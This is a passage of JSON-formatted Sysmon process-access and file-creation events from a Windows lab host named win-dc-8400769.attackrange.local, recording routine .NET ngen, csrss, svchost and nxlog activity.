{E2A3D6B1-131F-5F25-0000-001060D00A00}\r\nTargetProcessId: 4804\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:47.183","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-131F-5F25-0000-001060D00A00}","TargetProcessId":"4804","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:00:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7308,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:47.183\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-131F-5F25-0000-001060D00A00}\r\nTargetProcessId: 4804\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:47.183","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-131F-5F25-0000-001060D00A00}","TargetProcessId":"4804","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7309,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:47.621\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:47.621","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:00:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7310,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:00:47.621\r\nProcessGuid: {E2A3D6B1-131F-5F25-0000-001060D00A00}\r\nProcessId: 4804\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\12c4-0\\PresentationFramework.Aero2.dll\r\nCreationUtcTime: 2020-08-01 07:00:47.621","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:00:47.621","ProcessGuid":"{E2A3D6B1-131F-5F25-0000-001060D00A00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\12c4-0\\PresentationFramework.Aero2.dll","CreationUtcTime":"2020-08-01 07:00:47.621","EventReceivedTime":"2020-08-01 07:00:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7311,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:47.667\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-131F-5F25-0000-001074D50A00}\r\nTargetProcessId: 5040\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:47.667","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-131F-5F25-0000-001074D50A00}","TargetProcessId":"5040","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7312,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:47.667\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-131F-5F25-0000-001074D50A00}\r\nTargetProcessId: 5040\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:47.667","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-131F-5F25-0000-001074D50A00}","TargetProcessId":"5040","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:00:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7313,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:47.667\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-131F-5F25-0000-001074D50A00}\r\nTargetProcessId: 5040\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:47.667","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-131F-5F25-0000-001074D50A00}","TargetProcessId":"5040","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7314,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:47.730\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-131F-5F25-0000-001096D90A00}\r\nTargetProcessId: 4652\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:47.730","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-131F-5F25-0000-001096D90A00}","TargetProcessId":"4652","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7315,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:47.730\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-131F-5F25-0000-001096D90A00}\r\nTargetProcessId: 4652\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:47.730","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-131F-5F25-0000-001096D90A00}","TargetProcessId":"4652","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:00:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
